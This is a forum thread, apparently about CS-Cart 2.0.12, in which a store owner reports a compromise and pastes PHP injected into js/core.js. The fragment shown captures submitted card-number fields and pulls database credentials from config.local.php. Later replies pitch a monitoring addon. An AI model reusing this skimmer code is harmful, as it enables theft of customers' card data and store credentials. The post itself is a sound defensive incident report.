Back Door Security Treat On 2.012?

I am currently on 2.012

Saw something suspicious and went into Control Panel and looked up latest vistors. Noticed a IP address

going into

			<div> </div>
	<p>plus also into </p>

	<p> </p>

I have the original files and noticed the first file didnt exist with 2.012.

Then i looked at js.core.js and also saw the below added to file. looks like they are trying to capture credit cards. I deleted first file and replaced the second file with the original. This just happened as im also manually looking into all the other files.

Hopefully this is not another exploit of the software like the one last winter.

Below was added to js/core.js

$r = $_POST;
$u = '';
$naem = 'justcoMMONS';
$cookiename = 'sess_id';
if (isset($r['payment_info']['card_number'])) {
$r = $r['payment_info'];
$f = array(
foreach ($f as $ff)
$ok[] = $r[$ff];
$conf = file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/config.local.php');
$fields = array('db_host', 'db_name', 'db_user', 'db_password');
$db = array();
foreach ($fields as $f) {
preg_match('#^\$config\[[\'"]' . $f . '[\'"].+?[\'"](.+?)[\'"]#m', $conf, $m);
$db[$f] = $m[1];

Install our EZ Admin Helper addon. It can monitor all your files for changes as well as detect 14 different known security threats to cs-cart. It can do tons of other things too. Docs are here.

I am on 2.0.12 and software only works from 2.2 version and up.

Would have been inerested.


Yep, there were changes made that make it difficult to go back any further than we have and all newer enhancements (past couple of years) have only been added to he V4 version....